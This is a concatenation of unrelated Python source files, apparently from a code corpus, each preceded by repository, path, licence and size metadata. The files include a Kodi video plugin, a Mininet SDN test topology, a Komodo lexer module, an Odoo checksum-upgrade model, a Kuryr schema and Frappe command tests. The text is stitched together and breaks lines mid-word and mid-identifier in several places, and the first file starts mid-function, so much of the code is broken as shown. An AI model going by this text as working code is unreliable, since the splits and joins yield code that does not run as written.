cost """ url = "https://www.googleapis.com/youtube/v3/i18nLanguages" query = {"part": "snippet", "fields": "items/id", "key": key} try: urlopen(url + "?" + urlencode(query)).read() message = "The key, '" + key + "' will now be used for API requests." # Make pafy use the same api key pafy.set_api_key(Config.API_KEY.get) return dict(valid=True, message=message) except HTTPError: message = "Invalid key or quota exceeded, '" + key + "'" return dict(valid=False, message=message) def check_ddir(d): """ Check whether dir is a valid directory. """ expanded = os.path.expa
nduser(d) if os.path.isdir(expanded): message = "Downloads will be saved to " + c.y + d + c.w return dict(valid=True, message=message, value=expanded) else: message =
"Not a valid directory: " + c.r + d + c.w return dict(valid=False, message=message) def check_win_pos(pos): """ Check window position input. """ if not pos.strip(): return dict(valid=True, message="Window position not set (default)") pos = pos.lower() reg = r"(TOP|BOTTOM).?(LEFT|RIGHT)" if not re.match(reg, pos, re.I): msg = "Try something like top-left or bottom-right (or default)" return dict(valid=False, message=msg) else: p = re.match(reg, pos, re.I).groups() p = "%s-%s" % p msg = "Window position set to %s" % p return dict(valid=True, message=msg, value=p) def check_win_size(size): """ Check window size input. """ if not size.strip(): return dict(valid=True, message="Window size not set (default)") size = size.lower() reg = r"\d{1,4}x\d{1,4}" if not re.match(reg, size, re.I): msg = "Try something like 720x480" return dict(valid=False, message=msg) else: return dict(valid=True, value=size) def check_encoder(option): """ Check encoder value is acceptable. """ encs = g.encoders if option >= len(encs): message = "%s%s%s is too high, type %sencoders%s to see valid values" message = message % (c.y, option, c.w, c.g, c.w) return dict(valid=False, message=message) else: message = "Encoder set to %s%s%s" message = message % (c.y, encs[option]['name'], c.w) return dict(valid=True, message=message) def check_player(player): """ Check player exefile exists and get mpv version. """ if util.has_exefile(player): print(player) util.assign_player(player) if "mpv" in player: version = "%s.%s.%s" % g.mpv_version fmt = c.g, c.w, c.g, c.w, version msg = "%splayer%s set to %smpv%s (version %s)" % fmt return dict(valid=True, message=msg, value=player) else: msg = "%splayer%s set to %s%s%s" % (c.g, c.w, c.g, player, c.w) return dict(valid=True, message=msg, value=player) else: if mswin and not (player.endswith(".exe") or player.endswith(".com")): # Using mpv.exe has issues; use mpv.com
delletenebre/xbmc-addon-kilogramme
plugin.video.kilogramme/resources/lib/site_ockg.py
Python
gpl-3.0
20,423
0.0036
#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2, re, json, time, xbmc, traceback from _header import * BASE_URL = 'http://cinemaonline.kg/' BASE_NAME = 'Cinema Online' BASE_LABEL = 'oc' GA_CODE = 'UA-34889597-1' NK_CODE = '1744' def default_oc_noty(): plugin.notify('Сервер недоступен', BASE_NAME, image=get_local_icon('noty_' + BASE_LABEL)) def get_oc_cookie(): result = {'phpsessid': '', 'utmp': '', 'set': ''} cookie = plugin.get_storage(BASE_LABEL, TTL=1440) try: result['phpsessid'] = cookie['phpsessid'] result['utmp'] = cookie['utmp'] result['set'] = cookie['set'] except: try: a = common.fetchPage({'link': BASE_URL}) b = common.fetchPage({'link': BASE_URL + 'cinema.png?' + str(int(time.time()))}) cookie['set'] = a['header']['Set-Cookie'] + '; ' + b['header']['Set-Cookie'] result['set'] = cookie['set'] cookies = common.getCookieInfoAsHTML() cookie['phpsessid'] = common.parseDOM(cookies, 'cookie', attrs={'name': 'PHPSESSID'}, ret='value')[0] try: cookie['utmp'] = common.parseDOM(cookies, 'cookie', attrs={'name': '_utmp'}, ret='value')[0] except: cookie['utmp'] = common.parseDOM(cookies, 'cookie', attrs={'name': '__utmp'}, ret='value')[0] result['phpsessid'] = cookie['phpsessid'] result['utmp'] = cookie['utmp'] except: pass return result COOKIE = '' # get_oc_cookie() BASE_API_URL = BASE_URL + 'api.php?format=json' # &' + COOKIE['phpsessid'] + '&JsHttpRequest='+str(int(time.time()))+'-xml' @plugin.route('/site/' + BASE_LABEL) def oc_index(): items = [{ 'label': set_color('[ Поиск ]', 'dialog', True), 'path': plugin.url_for('oc_search'), 'icon': get_local_icon('find') }, { 'label': set_color('Новинки на CinemaOnline', 'light'), 'path': plugin.url_for('oc_category', id=0) }, { 'label': set_color('По жанрам', 'bold'), 'path': plugin.url_for('oc_genres') }, { 'label': 'Бестселлеры', 'path': plugin.url_for('oc_bestsellers') }, { 'label': 'Лучшие по версии IMDB', 'path': plugin.url_for('oc_category', id=2) }, { 'label': 'Лучшие по версии КиноПоиск', 'path': plugin.url_for('oc_category', id=9) }] return items @plugin.route('/site/' + BASE_LABEL + '/genre') def oc_genres(): item_list = get_genres() items = [{ 'label': item['label'], 'path': plugin.url_for('oc_genre', id=item['id']) } for item in item_list] return items @plugin.route('/site/' + BASE_LABEL + '/bestsellers') def oc_bestsellers(): item_list = get_bestsellers() items = [{ 'label': item['label'], 'path': plugin.url_for('oc_movie', id=item['id']), 'icon': item['icon'], } for item in item_list] return items @plugin.route('/site/' + BASE_LABEL + '/genre/<id>') def oc_genre(id): item_list = get_genre_movie_list(id) items = [{ 'label': item['label'], 'path': plugin.url_for('oc_movie', id=item['id']), 'properties': item['properties'], 'icon': item['icon'], } for item in item_list['items']] if (item_list['sys_items']): items = add_pagination(items, item_list['sys_items'], 'oc_genre_pagination', id) return items @plugin.route('/site/' + BASE_LABEL + '/genre/<id>/<page>') def oc_genre_pagination(id, page='1'): page = int(page) item_list = get_genre_movie_list(id, page) items = [{ 'label': item['label'], 'path': plugin.url_for('oc_movie', id=item['id']), 'properties': item['properties'], 'icon': item['icon'], } for item in item_list['items']] if (item_list['sys_items']): items = add_pagination(items, item_list['sys_items'], 'oc_genre_pagination', id) return plugin.finish(items, update_listing=True) @plugin.route('/site/' + BASE_LABEL + '/category/<id>') def oc_category(id): item_list = get_movie_list(id) items = [{ 'label': item['label'], 'path': plugin.url_for('oc_movie', id=item['id']), 'properties': item['properties'], 'icon': item['icon'], } for item in item_list['items']] if (item_list['sys_items']): items = add_pagination(items, item_list['sys_items'], 'oc_categor
y_pagination', id) return items @plugin.route('/site/' + BASE_LABEL + '/category/<id>/<page>') def oc_category_pagination(id, page='1'): page = int(page) item_list = get_movie_list(id, page) items = [{ 'label': item['label'], 'path': plugin.url_for('oc_movie', id=item['id']), 'properties': item['propert
ies'], 'icon': item['icon'], } for item in item_list['items']] if (item_list['sys_items']): items = add_pagination(items, item_list['sys_items'], 'oc_category_pagination', id) return plugin.finish(items, update_listing=True) @plugin.route('/site/' + BASE_LABEL + '/to_page/category/<id>/<page>') def oc_go_to_page(id, page=1): search_page = common.getUserInputNumbers('Укажите страницу') if (search_page): search_page = int(search_page) - 1 if (int(search_page) > 0) else 1 item_list = get_movie_list(id, search_page) items = [{ 'label': item['label'], 'path': plugin.url_for('oc_movie', id=item['id']), 'properties': item['properties'], 'icon': item['icon'], } for item in item_list['items']] if (item_list['sys_items']): for item in item_list['sys_items']: items.insert(0, { 'label': item['label'], 'path': plugin.url_for('oc_go_to_page', id=id, page=item['page']) if ( item['search'] == True ) else plugin.url_for('oc_category_pagination', id=id, page=item['page']), 'icon': item['icon'] }) return plugin.finish(items, update_listing=True) else: plugin.redirect('plugin://' + plugin.id + '/site/' + BASE_LABEL + '/category/' + id + '/' + str(int(page) - 1)) @plugin.route('/site/' + BASE_LABEL + '/movie/<id>') def oc_movie(id): item_list = get_movie(id) # xbmc.log('Item list: ' + str(item_list)) items = [{ # 'title' : item['label'], 'label': item['label'], 'path': item['url'], 'thumbnail': item['icon'], 'properties': item['properties'], 'is_playable': True } for item in item_list['items']] if (item_list['playlist']): # xbmc.log('Item list play: ' + str(item_list['items'])) kgontv_playlist(item_list['items']) xbmc.executebuiltin('ActivateWindow(VideoPlaylist)') else: # xbmc.log('Item play: ' + str(items)) return items @plugin.route('/site/' + BASE_LABEL + '/search') def oc_search(): search_val = plugin.keyboard('', 'Что ищете?') if (search_val): item_list = get_search_results(str(search_val)) items = [{ 'label': item['label'], 'path': plugin.url_for('oc_movie', id=item['id']), 'icon': item['icon'], } for item in item_list] return items else: plugin.redirect('plugin://' + plugin.id + '/site/' + BASE_LABEL) # method def get_bestsellers(): items = [] try: result = common.fetchPage({'link': BASE_API_URL, 'post_data': {'action[0]': 'Vide
opennetworkinglab/spring-open
old-scripts/test-network/mininet/net.sprint5-templete.py
Python
apache-2.0
4,452
0.02628
#!/usr/bin/python NWID=1 NR_NODES=20 #Controllers=[{"ip":'127.0.0.1', "port":6633}, {"ip":'10.0.1.28', "port":6633}] Controllers=[{"ip":'10.0.1.28', "port":6633}] """ Start up a Simple topology """ from mininet.net import Mininet from mininet.node import Controller, RemoteController from mininet.log import setLogLevel, info, error, warn, debug from mininet.cli import CLI from mininet.topo import Topo from mininet.util import quietRun from mininet.moduledeps import pathCheck from mininet.link import Link, TCLink from sys import exit import os.path from subprocess import Popen, STDOUT, PIPE import sys #import argparse class MyController( Controller ): def __init__( self, name, ip='127.0.0.1', port=6633, **kwargs): """Init. name: name to give controller ip: the IP address where the remote controller is listening port: the port where the remote controller is listening""" Controller.__init__( self, name, ip=ip, port=port, **kwargs ) def start( self ): "Overridden to do nothing." return def stop( self ): "Overridden to do nothing." return def checkListening( self ): "Warn if remote controller is not ac
cessible" listening = self.cmd( "echo A | telnet -e A %s %d" % ( self.ip, self.port ) ) if 'Unable' in listening: warn( "Unable to contact the remote controller" " at %s:%d\n" % ( self.ip, self.port ) ) class SDNTopo( Topo ): "SDN Topology" def __init__( self, *args, **kwargs ): Topo.__init__( self, *args, **kwargs ) switch = [] ho
st = [] root = [] for i in range (NR_NODES): name_suffix = '%02d' % NWID + "." + '%02d' % i dpid_suffix = '%02x' % NWID + '%02x' % i dpid = '0000' + '0000' + '0000' + dpid_suffix sw = self.addSwitch('sw'+name_suffix, dpid=dpid) switch.append(sw) for i in range (NR_NODES): host.append(self.addHost( 'host%d' % i )) for i in range (NR_NODES): root.append(self.addHost( 'root%d' % i, inNamespace=False )) for i in range (NR_NODES): self.addLink(host[i], switch[i]) for i in range (1, NR_NODES): self.addLink(switch[0], switch[i]) for i in range (NR_NODES): self.addLink(root[i], host[i]) def startsshd( host ): "Start sshd on host" info( '*** Starting sshd\n' ) name, intf, ip = host.name, host.defaultIntf(), host.IP() banner = '/tmp/%s.banner' % name host.cmd( 'echo "Welcome to %s at %s" > %s' % ( name, ip, banner ) ) host.cmd( '/usr/sbin/sshd -o "Banner %s"' % banner, '-o "UseDNS no"' ) info( '***', host.name, 'is running sshd on', intf, 'at', ip, '\n' ) def startsshds ( hosts ): for h in hosts: startsshd( h ) def stopsshd( ): "Stop *all* sshd processes with a custom banner" info( '*** Shutting down stale sshd/Banner processes ', quietRun( "pkill -9 -f Banner" ), '\n' ) def sdnnet(opt): topo = SDNTopo() info( '*** Creating network\n' ) #net = Mininet( topo=topo, controller=MyController, link=TCLink) net = Mininet( topo=topo, link=TCLink, build=False) controllers=[] for c in Controllers: rc = RemoteController('c%d' % Controllers.index(c), ip=c['ip'],port=c['port']) print "controller ip %s port %s" % (c['ip'], c['port']) controllers.append(rc) net.controllers=controllers net.build() host = [] for i in range (NR_NODES): host.append(net.get( 'host%d' % i )) net.start() sw=net.get('sw01.00') print "center sw", sw sw.attach('tapa0') for i in range (NR_NODES): host[i].defaultIntf().setIP('192.168.%d.%d/16' % (NWID,i)) root = [] for i in range (NR_NODES): root.append(net.get( 'root%d' % i )) for i in range (NR_NODES): host[i].intf('host%d-eth1' % i).setIP('1.1.%d.1/24' % i) root[i].intf('root%d-eth0' % i).setIP('1.1.%d.2/24' % i) stopsshd () startsshds ( host ) if opt=="cli": CLI(net) stopsshd() net.stop() if __name__ == '__main__': setLogLevel( 'info' ) if len(sys.argv) == 1: sdnnet("cli") elif len(sys.argv) == 2 and sys.argv[1] == "-n": sdnnet("nocli") else: print "%s [-n]" % sys.argv[0]
anisku11/sublimeku
Packages/CodeComplice/libs/codeintel2/udl.py
Python
mit
23,772
0.000463
#!python # ***** BEGIN LICENSE BLOCK ***** # Version: MPL 1.1/GPL 2.0/LGPL 2.1 # # The contents of this file are subject to the Mozilla Public License # Version 1.1 (the "License"); you may not use this file except in # compliance with the License. You may obtain a copy of the License at # http://www.mozilla.org/MPL/ # # Software distributed under the License is distributed on an "AS IS" # basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the # License for the specific language governing rights and limitations # under the License. # # The Original Code is Komodo code. # # The Initial Developer of the Original Code is ActiveState Software Inc. # Portions created by ActiveState Software Inc are Copyright (C) 2000-2007 # ActiveState Software Inc. All Rights Reserved. # # Contributor(s): # ActiveState Software Inc # # Alternatively, the contents of this file may be used under the terms of # either the GNU General Public License Version 2 or later (the "GPL"), or # the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), # in which case the provisions of the GPL or the LGPL are applicable instead # of those above. If you wish to allow use of your version of this file only # under the terms of either the GPL or the LGPL, and not to allow others to # use your version of this file under the terms of the MPL, indicate your # decision by deleting the provisions above and replace them with the notice # and other provisions required by the GPL or the LGPL. If you do not delete # the provisions above, a recipient may use your version of this file under # the terms of any one of the MPL, the GPL or the LGPL. # # ***** END LICENSE BLOCK ***** """UDL (User-Defined Language) support for codeintel.""" import os from os.path import dirname, join, abspath, normpath, basename, exists import sys import re import logging import threading import operator import traceback from pprint import pprint, pformat import SilverCity from SilverCity import ScintillaConstants from SilverCity.ScintillaConstants import * # XXX import only what we need from SilverCity.Lexer import Lexer from codeintel2.common import * from codeintel2.citadel import CitadelBuffer # from codeintel2.javascript_common import trg_from_pos as # javascript_trg_from_pos if _xpcom_: from xpcom import components from xpcom.server import UnwrapObject import directoryServiceUtils log = logging.getLogger("codeintel.udl") # log.setLevel(logging.DEBUG) # XXX We need to have a better mechanism for rationalizing and sharing # common lexer style classes. For now we'll just HACKily grab from # Komodo's styles.py. Some of this is duplicating logic in # KoLanguageServiceBase.py. _ko_src_dir = normpath(join(dirname(__file__), *([os.pardir]*3))) sys.path.insert(0, join(_ko_src_dir, "schemes")) try: import styles finally: del sys.path[0] del _ko_src_dir #---- module interface # Test 'udl/general/is_udl_x_style' tests these. def is_udl_m_style(style): return (ScintillaConstants.SCE_UDL_M_DEFAULT <= style <= ScintillaConstants.SCE_UDL_M_COMMENT) def is_udl_css_style(style): return (ScintillaConstants.SCE_UDL_CSS_DEFAULT <= style <= ScintillaConstants.SCE_UDL_CSS_OPERATOR) def is_udl_csl_style(style): return (ScintillaConstants.SCE_UDL_CSL_DEFAULT <= style <= ScintillaConstants.SCE_UDL_CSL_REGEX) def is_udl_ssl_style(style): return (ScintillaConstants.SCE_UDL_SSL_DEFAULT <= style <= ScintillaConstants.SCE_UDL_SSL_VARIABLE) def is_udl_tpl_style(style): return (ScintillaConstants.SCE_UDL_TPL_DEFAULT <= style <= ScintillaConstants.SCE_UDL_TPL_VARIABLE) # XXX Redundant code from koUDLLanguageBase.py::KoUDLLanguage # Necessary because SilverCity.WordList splits input on white-space _re_bad_filename_char = re.compile(r'([% \x80-\xff])') def _lexudl_path_escape(m): return '%%%02X' % ord(m.group(1)) def _urlescape(s): return _re_bad_filename_char.sub(_lexudl_path_escape, s) class UDLLexer(Lexer): """LexUDL wants the path to the .lexres file as the first element of the first keywords list. """ _lock = threading.Lock() _lexresfile_from_lang = None _extra_lexer_dirs = set() def __init__(self): self._properties = SilverCity.PropertySet() self._lexer = SilverCity.find_lexer_module_by_id( ScintillaConstants.SCLEX_UDL) lexres_path = _urlescape(self._get_lexres_path()) log.debug("escaped lexres_path: %r", lexres_path) self._keyword_lists = [ SilverCity.WordList(lexres_path), ] def tokenize_by_style(self, text, call_back=None): """LexUDL.cxx currently isn't thread-safe.""" self._lock.acquire() try: return Lexer.tokenize_by_style(self, text, call_back) finally: self._lock.release() @staticmethod def add_extra_lexer_dirs(dirs): UDLLexer._extra_lexer_dirs.update(dirs) UDLLexer._lexresfile_from_lang = None if _xpcom_: # Presume we are running under Komodo. Look in the available # lexres dirs from extensions. @staticmethod def _generate_lexer_mapping(): """Return dict {name > filename} of all lexer resource files (i.e. those ones that can include compiled UDL .lexres files). It yields directories that should "win" first. """ from glob import glob lexresfile_from_lang = {} koDirs = components.classes["@activestate.com/koDirs;1"] \ .getService(components.interfaces.koIDirs) # Find all possible lexer dirs. lexer_dirs = [] lexer_dirs.append(join(koDirs.userDataDir, "lexers")) # user for extensionDir in directoryServiceUtils.getExtensionDirectories(): lexer_dirs.append(join( extensionDir, "lexers")) # user-install extensions lexer_dirs.append(join( koDirs.commonDataDir, "lexers")) # site/common lexer_dirs.append(join(koDirs.supportDir, "lexers")) # factory for extra_dir in UDLLexer._extra_lexer_dirs: lexer_dirs.append(extra_dir) # Find all .lexeres files in these lexer dirs. for d in reversed(lexer_dirs): # first come, first served lexer_files = glob(join(d, "*.lexres")) for f in lexer_files: # Get lowered name without the ".lexres" extension. name = basename(f).lower().rsplit(".", 1)[0] lexresfile_from_lang[name] = f return lexre
sfile_from_lang else: @staticmethod def _generate_lexer_mapping(): """Return dict {name > filename} of all lexer resource files (i.e. those ones that can include co
mpiled UDL .lexres files). It yields directories that should "win" first. """ from glob import glob lexresfile_from_lang = {} # Find all possible lexer dirs. lexer_dirs = [] lexer_dirs.append(join(dirname(__file__), "lexers")) for extra_dir in UDLLexer._extra_lexer_dirs: lexer_dirs.append(extra_dir) # Find all .lexeres files in these lexer dirs. for d in reversed(lexer_dirs): # first come, first served lexer_files = glob(join(d, "*.lexres")) for f in lexer_files: # Get lowered name without the ".lexres" extension. name = basename(f).lower().rsplit(".", 1)[0] lexresfile_from_lang[name] = f return lexresfile_from_lang def _get_lexres_path(self): lexresfile_from_lang = UDLLexer._lexresfile_from_lang if lexresfile_from_lang is None: # Generate and cache it. lexresfile_from_lang = self._generate_lexer_mapping() UDLLexer._lexresfile_from_lang = lexresfile_from_lang lexres_file = lexresfile_from_lang.get(self.lang.
ddico/server-tools
module_auto_update/models/module.py
Python
agpl-3.0
6,204
0
# -*- coding: utf-8 -*- # Copyright 2017 LasLabs Inc. # Copyright 2018 ACSONE SA/NV. # License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl). import json import logging import os from openerp import api, exceptions, models, tools from openerp.modules.module import get_module_path from ..addon_hash import addon_hash PARAM_INSTALLED_CHECKSUMS = \ 'module_auto_update.installed_checksums' PARAM_EXCLUDE_PATTERNS = \ 'module_auto_update.exclude_patterns' DEFAULT_EXCLUDE_PATTERNS = \ '*.pyc,*.pyo,i18n/*.pot,i18n_extra/*.pot,static/*' _logger = logging.getLogger(__name__) class FailedUpgradeError(exceptions.Warning): pass class IncompleteUpgradeError(exceptions.Warning): pass def ensure_module_state(env, modules, state): # read module states, bypassing any Odoo cache if not modules: return env.cr.execute( "SELECT name FROM ir_module_module " "WHERE id IN %s AND state != %s", (tuple(modules.ids), state), ) names = [r[0] for r in env.cr.fetchall()] if names: raise FailedUpgradeError( "The following modules should be in state '%s' " "at this stage: %s. Bailing out for safety." % (state, ','.join(names), ), ) class Module(models.Model): _inherit = 'ir.module.module' @api.multi def _get_checksum_dir(self): self.ensure_one() exclude_patterns = self.env["ir.config_parameter"].get_param( PARAM_EXCLUDE_PATTERNS, DEFAULT_EXCLUDE_PATTERNS, ) exclude_patterns = [p.strip() for p in exclude_patterns.split(',')] keep_langs = self.env['res.lang'].search([]).mapped('code') module_path = get_module_path(self.name) if module_path and os.path.isdir(module_path): checksum_dir = addon_hash( module_path, exclude_patterns, keep_langs, ) else: checksum_dir = False return checksum_dir @api.model def _get_saved_checksums(self): Icp = self.env['ir.config_parameter'] return json.loads(Icp.get_param(PARAM_INSTALLED_CHECKSUMS, '{}')) @api.model def _save_checksums(self, checksums): Icp = self.env['ir.config_parameter'] Icp.set_param(PARAM_INSTALLED_CHECKSUMS, json.dumps(checksums)) @api.model def _save_installed_checksums(self): checksums = {} installed_modules = self.search([('state', '=', 'installed')]) for module in installed_modules: checksums[module.name] = module._get_checksum_dir() self._save_checksums(checksums) @api.model def _get_modules_partially_installed(self): return self.search([ ('state', 'in', ('to install', 'to remove', 'to upgrade')), ]) @api.model def _get_modules_with_changed_checksum(self): saved_checksums = self._get_saved_checksums() installed_modules = self.search([('state', '=', 'installed')]) return installed_modules.filtered( lambda r: r._get_checksum_dir() != saved_checksums.get(r.name), ) @api.model def upgrade_changed_checksum(self, overwrite_existing_translations=False): """Run an upgrade of the database, upgrading only changed modules. Installed modules for which the checksum has changed since the last successful run of this method are marked "to upgrade", then the normal Odoo scheduled upgrade process is launched. If there is no module with a changed checksum, and no module in state other than installed, uninstalled, uninstallable, th
is method does nothing, otherwise the normal Odoo upgrade process is launched. After a successful upgrade, the checksums of installed modules are saved. In case of error during the upgrade, an exception is raised. If any module remains to upgrade or to uninstall after the upgrade process, an exception is raised as well. Note: this method commits the current transaction at each important s
tep, it is therefore not intended to be run as part of a larger transaction. """ _logger.info( "Checksum upgrade starting (i18n-overwrite=%s)...", overwrite_existing_translations ) tools.config['overwrite_existing_translations'] = \ overwrite_existing_translations _logger.info("Updating modules list...") self.update_list() changed_modules = self._get_modules_with_changed_checksum() if not changed_modules and not self._get_modules_partially_installed(): _logger.info("No checksum change detected in installed modules " "and all modules installed, nothing to do.") return _logger.info("Marking the following modules to upgrade, " "for their checksums changed: %s...", ','.join(changed_modules.mapped('name'))) changed_modules.button_upgrade() self.env.cr.commit() # pylint: disable=invalid-commit # in rare situations, button_upgrade may fail without # exception, this would lead to corruption because # no upgrade would be performed and save_installed_checksums # would update cheksums for modules that have not been upgraded ensure_module_state(self.env, changed_modules, 'to upgrade') _logger.info("Upgrading...") self.env['base.module.upgrade'].upgrade_module() self.env.cr.commit() # pylint: disable=invalid-commit _logger.info("Upgrade successful, updating checksums...") self._save_installed_checksums() self.env.cr.commit() # pylint: disable=invalid-commit partial_modules = self._get_modules_partially_installed() if partial_modules: raise IncompleteUpgradeError( "Checksum upgrade successful " "but incomplete for the following modules: %s" % ','.join(partial_modules.mapped('name')) ) _logger.info("Checksum upgrade complete.")
midonet/kuryr
kuryr/schemata/endpoint_delete.py
Python
apache-2.0
1,400
0
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License
at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distri
buted on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from kuryr.schemata import commons ENDPOINT_DELETE_SCHEMA = { u'links': [{ u'method': u'POST', u'href': u'/NetworkDriver.DeleteEndpoint', u'description': u'Delete an Endpoint', u'rel': u'self', u'title': u'Delete' }], u'title': u'Delete endpoint', u'required': [u'NetworkID', u'EndpointID'], u'definitions': {u'commons': {}}, u'$schema': u'http://json-schema.org/draft-04/hyper-schema', u'type': u'object', u'properties': { u'NetworkID': { u'description': u'Network ID', u'$ref': u'#/definitions/commons/definitions/id' }, u'EndpointID': { u'description': u'Endpoint ID', u'$ref': u'#/definitions/commons/definitions/id' } } } ENDPOINT_DELETE_SCHEMA[u'definitions'][u'commons'] = commons.COMMONS
frappe/frappe
frappe/tests/test_commands.py
Python
mit
22,402
0.025266
# Copyright (c) 2022, Frappe Technologies Pvt. Ltd. and Contributors # License: MIT. See LICENSE # imports - standard imports import gzip import importlib import json import os import shlex import shutil import subprocess import unittest from contextlib import contextmanager from functools import wraps from glob import glob from typing import List, Optional from unittest.case import skipIf from unittest.mock import patch # imports - third party imports import click from click.testing import CliRunner, Result from click import Command # imports - module imports import frappe import frappe.commands.site import frappe.commands.utils import frappe.recorder from frappe.installer import add_to_installed_apps, remove_app from frappe.utils import add_to_date, get_bench_path, get_bench_relative_path, now from frappe.utils.backups import fetch_latest_backups _result: Optional[Result] = None TEST_SITE = "commands-site-O4PN2QKA.test" # added random string tag to avoid collisions CLI_CONTEXT = frappe._dict(sites=[TEST_SITE]) def clean(value) -> str: """Strips and converts bytes to str Args: value ([type]): [description] Returns: [type]: [description] """ if isinstance(value, bytes): value = value.decode() if isinstance(value, str): value = value.strip() return value def missing_in_backup(doctypes: List, file: os.PathLike) -> List: """Returns list of missing doctypes in the backup. Args: doctypes (list): List of DocTypes to be checked file (str): Path of the database file Returns: doctypes(list): doctypes that are missing in backup """ predicate = ( 'COPY public."tab{}"' if frappe.conf.db_type == "postgres" else "CREATE TABLE `tab{}`" ) with gzip.open(file, "rb") as f: content = f.read().decode("utf8").lower() return [doctype for doctype in doctypes if predicate.format(doctype).lower() not in content] def exists_in_backup(doctypes: List, file: os.PathLike) -> bool: """Checks if the list of doctypes exist in the database.sql.gz file supplied Args: doctypes (list): List of DocTypes to be checked file (str): Path of the database file Returns: bool: True if all tables exist """ missing_doctypes = missing_in_backup(doctypes, file) return len(missing_doctypes) == 0 @contextmanager def maintain_locals(): pre_site = frappe.local.site pre_flags = frappe.local.flags.copy() pre_db = frappe.local.db try: yield finally: post_site = getattr(frappe.local, "site", None) if not post_site or post_site != pre_site: frappe.init(site=pre_site) frappe.local.db = pre_db frappe.local.flags.update(pre_flags) def pass_test_context(f): @wraps(f) def decorated_function(*args, **kwargs): return f(CLI_CONTEXT, *args, **kwargs) return decorated_function @contextmanager def cli(cmd: Command, args: Optional[List] = None): with maintain_locals(): global _result patch_ctx = patch("frappe.commands.pass_context", pass_test_context) _module = cmd.callback.__module__ _cmd = cmd.callback.__qualname__ __module = importlib.import_module(_module) patch_ctx.start() importlib.reload(__module) click_cmd = getattr(__module, _cmd) try: _result = CliRunner().invoke(click_cmd, args=args) _result.command = str(cmd) yield _result finally: patch_ctx.stop() __module = importlib.import_module(_module) importlib.reload(__module) importlib.invalidate_caches() class BaseTestCommands(unittest.TestCase): @classmethod def setUpClass(cls) -> None: cls.setup_test_site() return super().setUpClass() @classmethod def execute(self, command, kwargs=None): site = {"site": frappe.local.site} cmd_input = None if kwargs: cmd_input = kwargs.get("cmd_input", None) if cmd_input: if not isinsta
nce(cmd_input, bytes): raise Exception( f"The input should be of type bytes, not {type(cmd_input).__name__}" ) del kwargs["cmd_input"] kwargs.update(site) else: kwargs = site self.command = " ".join(command.split()).format(**kwargs) click.secho(self.command, fg="bright_black")
command = shlex.split(self.command) self._proc = subprocess.run(command, input=cmd_input, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.stdout = clean(self._proc.stdout) self.stderr = clean(self._proc.stderr) self.returncode = clean(self._proc.returncode) @classmethod def setup_test_site(cls): cmd_config = { "test_site": TEST_SITE, "admin_password": frappe.conf.admin_password, "root_login": frappe.conf.root_login, "root_password": frappe.conf.root_password, "db_type": frappe.conf.db_type, } if not os.path.exists( os.path.join(TEST_SITE, "site_config.json") ): cls.execute( "bench new-site {test_site} --admin-password {admin_password} --db-type" " {db_type}", cmd_config, ) def _formatMessage(self, msg, standardMsg): output = super(BaseTestCommands, self)._formatMessage(msg, standardMsg) if not hasattr(self, "command") and _result: command = _result.command stdout = _result.stdout_bytes.decode() if _result.stdout_bytes else None stderr = _result.stderr_bytes.decode() if _result.stderr_bytes else None returncode = _result.exit_code else: command = self.command stdout = self.stdout stderr = self.stderr returncode = self.returncode cmd_execution_summary = "\n".join([ "-" * 70, "Last Command Execution Summary:", "Command: {}".format(command) if command else "", "Standard Output: {}".format(stdout) if stdout else "", "Standard Error: {}".format(stderr) if stderr else "", "Return Code: {}".format(returncode) if returncode else "", ]).strip() return "{}\n\n{}".format(output, cmd_execution_summary) class TestCommands(BaseTestCommands): def test_execute(self): # test 1: execute a command expecting a numeric output self.execute("bench --site {site} execute frappe.db.get_database_size") self.assertEqual(self.returncode, 0) self.assertIsInstance(float(self.stdout), float) # test 2: execute a command expecting an errored output as local won't exist self.execute("bench --site {site} execute frappe.local.site") self.assertEqual(self.returncode, 1) self.assertIsNotNone(self.stderr) # test 3: execute a command with kwargs # Note: # terminal command has been escaped to avoid .format string replacement # The returned value has quotes which have been trimmed for the test self.execute("""bench --site {site} execute frappe.bold --kwargs '{{"text": "DocType"}}'""") self.assertEqual(self.returncode, 0) self.assertEqual(self.stdout[1:-1], frappe.bold(text="DocType")) @unittest.skip def test_restore(self): # step 0: create a site to run the test on global_config = { "admin_password": frappe.conf.admin_password, "root_login": frappe.conf.root_login, "root_password": frappe.conf.root_password, "db_type": frappe.conf.db_type, } site_data = {"test_site": TEST_SITE, **global_config} for key, value in global_config.items(): if value: self.execute(f"bench set-config {key} {value} -g") # test 1: bench restore from full backup self.execute("bench --site {test_site} backup --ignore-backup-conf", site_data) self.execute( "bench --site {test_site} execute frappe.utils.backups.fetch_latest_backups", site_data, ) site_data.update({"database": json.loads(self.stdout)["database"]}) self.execute("bench --site {test_site} restore {database}", site_data) # test 2: restore from partial backup self.execute("bench --site {test_site} backup --exclude 'ToDo'", site_data) site_data.update({"kw": "\"{'partial':True}\""}) self.execute( "bench --site {test_site} execute" " frappe.utils.backups.fetch_latest_backups --kwargs {kw}", site_data, ) site_data.update({"database": json.loads(self.stdout)["database"]}) self.execute("bench --site {test_site} restore {database}", site_data) self.assertEqual(self.returncode, 1) def test_partial_restore(self): _now = now() for num in range(10): frappe.get_doc({ "doctype": "ToDo", "date": add_to_date(_now, days=num), "description": frappe.mock("paragraph") }).insert() frappe.db.commit() todo_count = frappe.db
insequent/kargo
library/kube.py
Python
apache-2.0
8,694
0.00161
